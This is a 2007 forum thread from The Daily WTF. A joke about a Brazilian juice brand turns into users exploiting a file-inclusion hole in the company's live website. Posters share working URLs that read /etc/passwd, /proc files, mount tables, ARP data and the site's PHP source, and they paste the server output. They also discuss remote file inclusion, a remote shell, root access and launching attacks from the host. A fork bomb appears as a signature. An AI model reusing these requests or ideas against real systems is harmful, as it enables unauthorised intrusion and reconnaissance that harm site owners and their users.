The Daily WTF: Curious Perversions in Information Technology
Welcome to TDWTF Forums Sign in | Join | Help
in Search

Sukest's Suks Juice

Last post 04-14-2007 6:37 PM by plazmo. 30 replies.
Page 1 of 1 (31 items)
Sort Posts: Previous Next
  • 04-11-2007 11:57 AM

    • Tatiano
    • Not Ranked
    • Joined on 09-03-2006
    • Brasil
    • Posts 59

    Sukest's Suks Juice

    I saw this juice while shopping some time ago...

    Guess what!

    it doesn't sucks...

     

    http://www.sukest.com.br/template.php?pagina=produtos.php&product=578&category=552&screen=0&search=


     Sucks

  • 04-11-2007 2:10 PM In reply to

    Re: Sukest's Suks Juice

    Funny.  Is the name possibly related to the fact that kids might drink the juice through a straw?  Or is it just a happy and amusing coincidence?

     

    What Would Brian Boitano Do?
  • 04-11-2007 2:38 PM In reply to

    Re: Sukest's Suks Juice

    cconroy:

    Funny.  Is the name possibly related to the fact that kids might drink the juice through a straw?  Or is it just a happy and amusing coincidence?

     

     

    Probably a coincident. Its portuguese, but its a brand name so im not sure that it could mean similar to sucks in english

  • 04-11-2007 2:54 PM In reply to

    Re: Sukest's Suks Juice

    haha, the real wtf is there site. I found a way to download what seems like any file off their server
  • 04-11-2007 3:04 PM In reply to

    Re: Sukest's Suks Juice

    If you're ever in France, try this lemon soda.  It's really good, even if it does taste like ... lemon soda.

    http://www.pschitt.fr/

     

  • 04-11-2007 3:25 PM In reply to

    • H3SO5
    • Not Ranked
    • Joined on 12-05-2006
    • Canoas, Brazil
    • Posts 44

    Re: Sukest's Suks Juice

    This ad is for the Brazilian (and maybe Latin American) market.

    In Portuguese, "suks" does not have any meaning, but it sounds like "suco" (juice).
     


    To err is human, but to really mess things up, you need a computer.
  • 04-11-2007 3:39 PM In reply to

    • H3SO5
    • Not Ranked
    • Joined on 12-05-2006
    • Canoas, Brazil
    • Posts 44

    Re: Sukest's Suks Juice

    newfweiler:

    If you're ever in France, try this lemon soda.  It's really good, even if it does taste like ... lemon soda.

    http://www.pschitt.fr/

     

     

    Heh. I love the "Pschitt! Yourself" option on the main site. 

    To err is human, but to really mess things up, you need a computer.
  • 04-11-2007 4:56 PM In reply to

    • rbowes
    • Top 150 Contributor
    • Joined on 02-09-2007
    • Winnipeg, MB
    • Posts 412

    Re: Sukest's Suks Juice

    plazmo:
    haha, the real wtf is there site. I found a way to download what seems like any file off their server

    Ahh, that classics. Once I figured out that "pagina" doesn't mean what I thought it did, it was easy!

    http://www.sukest.com.br/template.php?pagina=/etc/passwd&product=578&category=552&screen=0&search= 

    Luckily, their webserver isn't running as r00t!  

    Bets on whether this allows remote file inclusion? *doesn't want to try* 

  • 04-11-2007 7:08 PM In reply to

    • kirchhoff
    • Top 500 Contributor
    • Joined on 02-27-2007
    • ECE 280 (Circuit Analysis)
    • Posts 217

    Re: Sukest's Suks Juice

    http://www.sukest.com.br/template.php?pagina=/etc/slackware-version&category=552&screen=0&search=

    Slackware 11. 2.6.7 kernel. 

  • 04-11-2007 8:43 PM In reply to

    Re: Sukest's Suks Juice

    kirchhoff:

    http://www.sukest.com.br/template.php?pagina=/etc/slackware-version&category=552&screen=0&search=

    Slackware 11. 2.6.7 kernel. 

    try /proc. http://www.sukest.com.br/template.php?pagina=/proc/cpuinfo
          processor	: 0
    vendor_id	: GenuineIntel
    cpu family	: 15
    model		: 6
    model name	: Intel(R) Pentium(R) D CPU 2.80GHz
    stepping	: 4
    cpu MHz		: 2800.416
    cache size	: 2048 KB
    physical id	: 0
    siblings	: 2
    core id		: 0
    cpu cores	: 2
    fdiv_bug	: no
    hlt_bug		: no
    f00f_bug	: no
    coma_bug	: no
    fpu		: yes
    fpu_exception	: yes
    cpuid level	: 6
    wp		: yes
    flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl est cid cx16 xtpr lahf_lm
    bogomips	: 5605.42
    
    processor	: 1
    vendor_id	: GenuineIntel
    cpu family	: 15
    model		: 6
    model name	: Intel(R) Pentium(R) D CPU 2.80GHz
    stepping	: 4
    cpu MHz		: 2800.416
    cache size	: 2048 KB
    physical id	: 0
    siblings	: 2
    core id		: 1
    cpu cores	: 2
    fdiv_bug	: no
    hlt_bug		: no
    f00f_bug	: no
    coma_bug	: no
    fpu		: yes
    fpu_exception	: yes
    cpuid level	: 6
    wp		: yes
    flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl est cid cx16 xtpr lahf_lm
    bogomips	: 5600.70
    
    http://www.sukest.com.br/template.php?pagina=/etc/mtab
    
          /dev/sda2 / reiserfs rw 0 0
    proc /proc proc rw 0 0
    sysfs /sys sysfs rw 0 0
    file:/home/apache /mnt/apache nfs rw,rsize=8192,wsize=8192,hard,intr,addr=10.174.141.105 0 0
    file:/home/firstsite /mnt/firstsite nfs rw,addr=10.174.141.105 0 0
    file:/home/sites /mnt/sites nfs rw,addr=10.174.141.105 0 0
    file:/home/aceite /mnt/aceite nfs rw,rsize=8192,wsize=8192,hard,intr,addr=10.174.141.105 0 0
    file:/home/tomcat4/webapps /opt/tomcat4/webapps nfs rw,addr=10.174.141.105 0 0
    file:/home/web /mnt/web nfs rw,addr=10.174.141.105 0 0
    file:/home/web/producao/java/tomcat5 /opt/tomcat5/webapps nfs rw,addr=10.174.141.105 0 0
    file:/home/web/producao/java/tomcat3 /opt/tomcat3/webapps nfs rw,addr=10.174.141.105 0 0
    
    http://www.sukest.com.br/template.php?pagina=/proc/uptime
    8473928.52 6995444.24
    http://www.sukest.com.br/template.php?pagina=/proc/net/arp
          IP address       HW type     Flags       HW address            Mask     Device
    10.174.141.2     0x1         0x2         00:0E:0C:4E:27:E5     *        eth0
    10.174.141.105   0x1         0x2         00:08:54:28:E5:2F     *        eth0
    10.174.141.5     0x1         0x2         00:0E:0C:4E:27:E5     *        eth0
    10.174.141.93    0x1         0x2         00:60:08:3A:11:EE     *        eth0
    10.0.0.20        0x1         0x2         00:01:03:DD:1B:9F     *        eth0
    10.174.141.110   0x1         0x2         00:50:04:81:5F:96     *        eth0
    10.174.141.91    0x1         0x2         00:60:08:3A:11:EE     *        eth0
    
    http://www.sukest.com.br/template.php?pagina=/proc/net/dev
     Inter-|   Receive                                                |  Transmit
     face |bytes    packets errs drop fifo frame compressed multicast|bytes    packets errs drop fifo colls carrier compressed
      eth0:871871887 680310827   15    0    0    15          0         0 2100491378 743447569    0    0    0     0       0          0
        lo:  628831    7990    0    0    0     0          0         0   628831    7990    0    0    0     0       0          0
    
    If anyone is really adventurous, go try and open some logs or a httpd.conf somewhere.
    :(){ :|:& };:
  • 04-12-2007 12:17 AM In reply to

    Re: Sukest's Suks Juice

     


    http://www.sukest.com.br/neodownload/force_download.php?file=/mnt/apache/www.sukest.com.br/template.php&name=template.php

     


  • 04-12-2007 2:06 AM In reply to

    • Daniel15
    • Not Ranked
    • Joined on 01-27-2007
    • Mountain View, CA
    • Posts 266

    Re: Sukest's Suks Juice

    plazmo:

     


    http://www.sukest.com.br/neodownload/force_download.php?file=/mnt/apache/www.sukest.com.br/template.php&name=template.php

     




    That's definitely a WTF :o
  • 04-12-2007 9:29 AM In reply to

    • KluZz
    • Not Ranked
    • Joined on 01-09-2007
    • Posts 1

    Re: Sukest's Suks Juice

    purely out of interest, do you guys know what a honeypot system is? :)
  • 04-12-2007 10:23 AM In reply to

    Re: Sukest's Suks Juice

    KluZz:
    purely out of interest, do you guys know what a honeypot system is? :)
    Ooh, look. A shiny <font>. cute. :)
    :(){ :|:& };:
  • 04-12-2007 10:52 AM In reply to

    Re: Sukest's Suks Juice

    The script is clearly running on the web server.

    You would face a honeypot trap when you try to sneak from a server to another. Eg. compromise the server and try to access another one on the network from it.

     

    I could be wrong, but this one is certainly not a honeypot.

  • 04-12-2007 11:10 AM In reply to

    Re: Sukest's Suks Juice

    KluZz:
    purely out of interest, do you guys know what a honeypot system is? :)

     

    Its a server set up with an intentional flaw to trap attackers.

    Ive seen a few in the past, but i dont think this is one. 

  • 04-12-2007 11:10 AM In reply to

    Re: Sukest's Suks Juice

    At least the webserver doesn't run as root ;)
    It's like they thought Unicode support might be a good idea but then realised doing it right would be hard, so they made wchar_t completely useless then sat back and ate donuts.

    /Vanders
  • 04-12-2007 11:11 AM In reply to

    Re: Sukest's Suks Juice

    fennec:
    KluZz:
    purely out of interest, do you guys know what a honeypot system is? :)
    Ooh, look. A shiny <font>. cute. :)

    There was that one person -- still may be around, actually -- that would embiggen and bold the first letter of all of his/her posts, in what I suppose was intended to be "ye olde manuscript" style.

  • 04-12-2007 12:19 PM In reply to

    • H3SO5
    • Not Ranked
    • Joined on 12-05-2006
    • Canoas, Brazil
    • Posts 44

    Re: Sukest's Suks Juice

    kirchhoff:

    http://www.sukest.com.br/template.php?pagina=/etc/slackware-version&category=552&screen=0&search=

    Slackware 11. 2.6.7 kernel. 


    http://www.sukest.com.br/template.php?pagina=/proc/version&category=552&screen=0&search=


    Linux version 2.6.19.1-POWER_EDGE_840 (root@web1) (gcc version 3.4.6) #3 SMP Tue Jan 2 14:14:51 BRST 2007

    To err is human, but to really mess things up, you need a computer.
  • 04-12-2007 4:07 PM In reply to

    Re: Sukest's Suks Juice

    Oddly, it won't let you view /dev/zero, /dev/random, or /dev/urandom.
  • 04-12-2007 7:15 PM In reply to

    • phaedrus
    • Top 500 Contributor
    • Joined on 03-19-2007
    • Seattle Ex-Pat living in the Bay Area
    • Posts 111

    Re: Sukest's Suks Juice

    Awesome. 
    All men are frauds. The only difference between them is that some admit it. I myself deny it.
    -- H. L. Mencken
  • 04-13-2007 4:46 AM In reply to

    • Kemp
    • Top 500 Contributor
    • Joined on 09-21-2006
    • Posts 126

    Re: Sukest's Suks Juice

    a href="template.php?pagina=arearestrita.htm&PHPSESSID=27f9ab0cde991c62f588ba7fce186b40

    Session ID hardcoded into the php source? This is madness.

  • 04-13-2007 8:15 AM In reply to

    Re: Sukest's Suks Juice

    Kemp:

    a href="template.php?pagina=arearestrita.htm&PHPSESSID=27f9ab0cde991c62f588ba7fce186b40

    Session ID hardcoded into the php source? This is madness.

    An artifact from slightly incorrect usage of session vars. 


    In complex analysis, a meromorphic function on an open subset D of the complex plane is a function that is holomorphic on all D except a set of isolated points

  • 04-13-2007 3:03 PM In reply to

    Re: Sukest's Suks Juice

    Ok, this is even more messed up than I thought. The "pagina" variable in template.php (thanks for that link :P) is run straight through include(), which according to the php document site: http://www.php.net/manual/en/function.include.php will allow remote execution of php files. This seems to me that one could write a php file that prints out php text, put it somewhere public, and have this site read it in. You know have unfettered access to the system (probably quite easy to write a remote shell) and can I'm sure quite easily get root access.

    I think someone needs to send an anonymous letter to this site warning them of the gaping security hole here...
     

  • 04-13-2007 3:58 PM In reply to

    • kirchhoff
    • Top 500 Contributor
    • Joined on 02-27-2007
    • ECE 280 (Circuit Analysis)
    • Posts 217

    Re: Sukest's Suks Juice

    The hosting provider is using privledge separation. The site is running as a virtual-host specific user without access to any really interesting files. You can certainly deface the site, but that's not very useful. It might be neat to launch attacks from it though, or configure it to run a Tor exit node.
  • 04-14-2007 4:10 AM In reply to

    • Daniel15
    • Not Ranked
    • Joined on 01-27-2007
    • Mountain View, CA
    • Posts 266

    Re: Sukest's Suks Juice

    JamesKilton:

    Ok, this is even more messed up than I thought. The "pagina" variable in template.php (thanks for that link :P) is run straight through include(), which according to the php document site: http://www.php.net/manual/en/function.include.php will allow remote execution of php files.


    Sure, it's used in an include() statement, but file_exists() is used to check if the file exists. Since this fails for remote files, no remote inclusion can be done.
  • 04-14-2007 12:22 PM In reply to

    Re: Sukest's Suks Juice

    Awesome. How many times do you get to download the sourcecode of a WTF straight from the implementation?
    Begging the question since 2007.
  • 04-14-2007 1:05 PM In reply to

    Re: Sukest's Suks Juice

    The best part is where they put .passwd_root_neodownload in a subdirectory of the login script, for easy access with any browser.
    Begging the question since 2007.
  • 04-14-2007 2:40 PM In reply to

    Re: Sukest's Suks Juice

    JamesKilton:

    I think someone needs to send an anonymous letter to this site warning them of the gaping security hole here...

    From their own root account. 

  • 04-14-2007 4:50 PM In reply to

    • iwpg
    • Top 500 Contributor
    • Joined on 05-24-2006
    • Posts 258

    Re: Sukest's Suks Juice

    Faxmachinen:
    Awesome. How many times do you get to download the sourcecode of a WTF straight from the implementation?

    Heh.  Maybe the code was released under the Affero Licence

  • 04-14-2007 6:37 PM In reply to

    Re: Sukest's Suks Juice

    Faxmachinen:
    The best part is where they put .passwd_root_neodownload in a subdirectory of the login script, for easy access with any browser.

     

    Yeah i seen that, but at least they didn't store the passwords as plain text. 

Page 1 of 1 (31 items)
Powered by Community Server (Non-Commercial Edition), by Telligent Systems